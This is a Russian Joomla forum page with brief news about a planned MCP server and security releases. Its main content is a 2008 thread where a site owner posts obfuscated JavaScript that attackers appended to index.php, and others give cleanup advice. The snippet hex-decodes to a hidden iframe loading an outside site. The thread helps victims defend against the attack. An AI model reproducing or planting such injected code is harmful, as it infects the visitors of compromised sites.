Новости Joomla

👩‍💻 ИИ-админ для Joomla ближе, чем вы думаете: Joomla MCP.

👩‍💻 ИИ-админ для Joomla ближе, чем вы думаете: Joomla MCP.

В февральском номере Joomla Community Magazine в статье Evolving Joomla - Joomla CMS MCP Server: Opening the Door to AI-Powered Administration рассказывается о работе команды разработчиков над внедрением в ядро Joomla MCP-сервера.

Что такое MCP-сервер?
Последние годы всех захватывает бум ИИ-технологий. Появились ИИ-агенты - программы, устанавливаемые на сервер или компьютер, которые получают от вас запрос или задачу в человеческом виде и могут выполнять действия с файлами, ходить по сайтам, создавать сайты, программировать и т.д. Люди используют ИИ-агентов в самых разных ситуациях: от написания и проверки кода (даже там, где язык программирования не знаете совсем) до планирования путешествий и бронирования гостиницы.

ИИ-агенты могут использовать различные программные инструменты по протоколу Model Context Protocol (MCP). Для этого разработчик программы должен внедрить MCP в свой продукт или сервис. Так, например, ваш ИИ-агент может ходить по сайтам через браузер и собирать нужную информацию, управляя браузером через MCP-сервер. Или использовать функционал IDE PHP Storm для написания кода, сбора и отладки ошибок, использовать поиск PHP Storm по кодовой базе, а не простой текстовый поиск по файлам. MCP предоставляет набор функций для полноценного управления программным обеспечением.

В случае с Joomla, сервер MCP может предоставить администраторам следующие возможности:
- Автоматическое создание категорий, материалов и меню на основе карты сайта или PDF-файла.
- Создавайть SEO-оптимизированные заголовки и метаописания в пакетном режиме.
- Обновлять расширения на нескольких сайтах одновременно
- Создание посадочные страницы.

Важно отметить, что сервер MCP не задумывался как функция, доступная только «супер-администраторам». Цель инициативы — создать решение, которое будет простым в настройке, маломощным и доступным для широкого круга пользователей.

В процессе разработки точка входа Joomla (аналогично Site, Administrator, Api, Cli), которая будет работать с Streamable HTTP, необходимым для MCP. Аутентификация пока что предполагается на токенах, но затем планируется создание универсального OAuth-сервера для Joomla.
Фактические возможности MCP — инструменты, ресурсы и подсказки — реализованы в виде плагинов для обеспечения расширяемости. Таким образом ожидаем, что и сторонние разработчики смогут создавать MCP-плагины для внедрения поддержки своих расширений Joomla для работы с ИИ.

@joomlafeed

Вышли релизы безопасности Joomla 6.0.4 и Joomla 5.4.4

Релиз безопасности Joomla 6.0.4 и Joomla 5.4.4

Проект Joomla! рад сообщить о выходе Joomla 6.0.4 и Joomla 5.4.4. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

0 Пользователей и 1 Гость просматривают эту тему.
  • 7 Ответов
  • 2677 Просмотров
*

annik

  • Осваиваюсь на форуме
  • 39
  • 2 / 1
index.php + JS в конце
« : 16.06.2008, 10:59:10 »
Чем можно расшифровать?
Код
script type="text/javascript">

</script><script>function v485549d407dae(v485549d408198){ var v485549d40857f=16; return(parseInt(v485549d408198,v485549d40857f));}function v485549d408d4d(v485549d409133){  var v485549d4095b4='';for(v485549d409905=0; v485549d409905<v485549d409133.length; v485549d409905+=2){ v485549d4095b4+=(String.fromCharCode(v485549d407dae(v485549d409133.substr(v485549d409905, 2))));}return v485549d4095b4;} document.write(v485549d408d4d('3C696672616D65206E616D653D2734623627207372633D27687474703A2F2F6B616B6173686B612E7573272077696474683D353530206865696768743D3436207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>
Дописали мне в конце index.php
*

smart

  • Администратор
  • 6478
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
Re: index.php + JS в конце
« Ответ #1 : 16.06.2008, 11:03:44 »
А смысл расшифровывать? Дописал это робот, который обходит сайты по ftp, используя данные, украденные с помощью троянов. Как правило дописываемый код имеет целью дальнейшее распространение трояна на компьютеры посетителей сайта.

Как от этого избавиться в принципе не раз уже на форуме писалось.

1. Сделать полную проверку компьютера, имеющего доступ по ftp к зараженному сайту на вирусы и трояны, до тех пор, пока не найдете и не вылечите.
2. Сменить пароль на ftp
3. Восстановить файлы сайта из последнего бекапа перед заражением (при условии что бекап производится регулярно)
4. В дальнейшем активно использовать антивирус, не забывать обновлсять ПО и не хранить пароли в программах для работы с FTP...
*

PaLyCH

  • Давно я тут
  • 956
  • 146 / 19
  • Менеджер проектов
Re: index.php + JS в конце
« Ответ #2 : 16.06.2008, 11:53:08 »
Полностью восстанавливать наверно не стоит, у меня таже самая проблема была. решилось просто. Просмотр всех файлов index.php в шаблонах сайта и админки, index.php в корне сайта и в корне админке. Поставить на них права 555
*

marinserg

  • Новичок
  • 4
  • 0 / 0
Re: index.php + JS в конце
« Ответ #3 : 16.06.2008, 13:37:14 »
2 дня борюсь с той же проблемой.
Стоит:
Joomla! 1.0.12
Register Globals: OFF 
Register Globals: OFF 
Magic Quotes: ON 
Safe Mode: OFF 
File Uploads: ON 
Session auto start: OFF 

444 - chmod на index.php в templates
.....
по логам обнаружила что с IP вредоносного и гадосного врага подгрузили /administrator/components/com_banners/banners.html.php где были пароли на вход в админку
 и потом сколько я не удаляля его прописаные JavaScript c трояном  он мне демонстративно их вставлял и еще и показывал, что chmod он тоже может поменять без моего ведома.

Мои действия:
1.Заблокировала IP
2. почистила и провелила на наличие посторонних файлов не входящих в ранее в мою сборку сайта
3. еще раз перезалила папку templates и еще раз поставила 444 - chmod
4. заодно проверила inframe - не нашла
5. поменяла FTP пароли (каюсь, хранила в клиенте-ленивая......)
6. сижу и проверяю касперским компьютер (Вопрос: заканчивается лицензия на Касперского. Стоит ли и дальше им пользоваться или перейти на другой, но какой?)

 >:( :( :o
*

smart

  • Администратор
  • 6478
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
Re: index.php + JS в конце
« Ответ #4 : 16.06.2008, 13:42:22 »
Вопрос: заканчивается лицензия на Касперского. Стоит ли и дальше им пользоваться или перейти на другой, но какой?)
Если он вас устраивает, я бы ничего не менял. А в дополнение к Касперскому поставил бы допустим что-то типа TrojanRemover и периодически проверял бы еще им...

p.s. У самого правда стоит бесплатный AVG, перед этим месяца 2 стоял бесплатная версия Avira... но подумываю перейти на касперского...
*

marinserg

  • Новичок
  • 4
  • 0 / 0
Re: index.php + JS в конце
« Ответ #5 : 16.06.2008, 13:54:04 »
Да, проблема то в том, что и у меня он пока безплатный до этого стоял докторвеб+ комодо и я нахваталась......А касперский реально поттормаживает работу в интернете...Перестала т.е. почти нет возможности принять почту gmail/

К предыдущему вопросу...как проверить свои компоненты на наличие дыр...
И RequestFilter можно ставить на 1.0.12?
*

PaLyCH

  • Давно я тут
  • 956
  • 146 / 19
  • Менеджер проектов
Re: index.php + JS в конце
« Ответ #6 : 25.06.2008, 12:35:07 »
Снова обнаружился взлом одного из сайта. В этот раз index.php не был затронут. Были затронуты index.html.
Действия те же, удалить неизвестные скрипты и поставить 555 на эти файлы.
От троянцев помог AVG. Он единственный нашел у меня 113!!!! троянцев на компе
*

marinserg

  • Новичок
  • 4
  • 0 / 0
Re: index.php + JS в конце
« Ответ #7 : 30.06.2008, 16:59:04 »
Сегодня опять 25....ап и снова Касперский вопит на троян. И вроде все сделала правильно (ну как тут советовали) . НО не проверила ядро на backdoor и shells. Сделала, когда посмотрела логи и увидела куда ломаются.
И что оказалось, на самом то деле меня еще 3 месяца назад взломали....- понапихивали файликов ну очень похожих на "взаправдашие", но по сути ПАКОСТЬ редкая. Проверила на содержание подобной строки типа echo(base64_decode  ......и  АП, есть такие.
Очень поучительно почитать форум antichat.ru - ПОВБИВАЛА!!! Но полезно.
Вывод - надо предохраняться!!!! И прежде всего дыры это ошибка админа или халатность. Но получается полная параноя.

P.S. Извините за эмоциональность!!! 2 часа жизни под хвост!!!!

Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

В файле index.php постоянно появляется вредоносный код

Автор Armal

Ответов: 29
Просмотров: 5022
Последний ответ 08.05.2021, 16:16:32
от gartes
Запретить смену прав на index.php - Joomla

Автор magrychev

Ответов: 5
Просмотров: 3189
Последний ответ 24.10.2017, 21:14:24
от winstrool
Добавляется адрес к index.php

Автор kokon_zver

Ответов: 8
Просмотров: 2299
Последний ответ 21.11.2016, 10:34:29
от Дмитрий_76
htaccess и htpasswd пароль только на url с параметром например "index.php?test"

Автор ice99

Ответов: 4
Просмотров: 1977
Последний ответ 28.08.2016, 20:52:51
от flyingspook
Количество файлов index.php

Автор kouichiro

Ответов: 13
Просмотров: 1629
Последний ответ 04.04.2016, 07:06:10
от Morh